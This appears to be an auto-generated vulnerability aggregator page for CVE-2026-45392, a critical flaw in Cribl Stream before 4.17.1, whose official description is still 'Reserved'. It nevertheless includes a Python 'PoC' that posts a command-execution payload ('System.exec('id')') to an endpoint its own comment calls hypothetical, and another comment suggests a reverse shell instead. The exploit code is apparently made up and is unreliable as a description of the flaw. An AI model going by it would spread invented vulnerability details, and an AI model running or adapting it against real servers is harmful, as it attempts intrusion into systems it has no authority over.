Security Vulnerability Report
中文
CVE-2026-45392 CVSS 9.8 CRITICAL

CVE-2026-45392

Published: 2026-05-12 02:16:13
Last Modified: 2026-05-15 12:17:09
Source: af879a92-7297-456a-bb0e-905ac6c64bdc

Description

Reserved. Details will be published at disclosure.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cribl Stream < 4.17.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept for CVE-2026-45392 # Description: This script demonstrates the RCE vulnerability by sending a crafted request. # Usage: python3 poc.py <target_ip> <target_port> import sys import requests # Target configuration target_ip = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1' target_port = sys.argv[2] if len(sys.argv) > 2 else '9000' url = f"http://{target_ip}:{target_port}/api/v1/endpoint" # Hypothetical vulnerable endpoint # Malicious payload attempting to execute 'id' command (Linux) # In a real scenario, this could be a reverse shell payload payload = { "config": { "eval": "System.exec('id')" } } print(f"[*] Sending payload to {url}...") try: response = requests.post(url, json=payload, timeout=5) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Body:") print(response.text) if "uid=" in response.text: print("[!] Vulnerability confirmed: Command execution detected!") except Exception as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45392", "sourceIdentifier": "af879a92-7297-456a-bb0e-905ac6c64bdc", "published": "2026-05-12T02:16:13.220", "lastModified": "2026-05-15T12:17:08.920", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reserved. Details will be published at disclosure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://docs.cribl.io/stream/release-notes/release-v4171#security-fixes", "source": "af879a92-7297-456a-bb0e-905ac6c64bdc"}, {"url": "https://trust.cribl.io/notifications", "source": "af879a92-7297-456a-bb0e-905ac6c64bdc"}]}}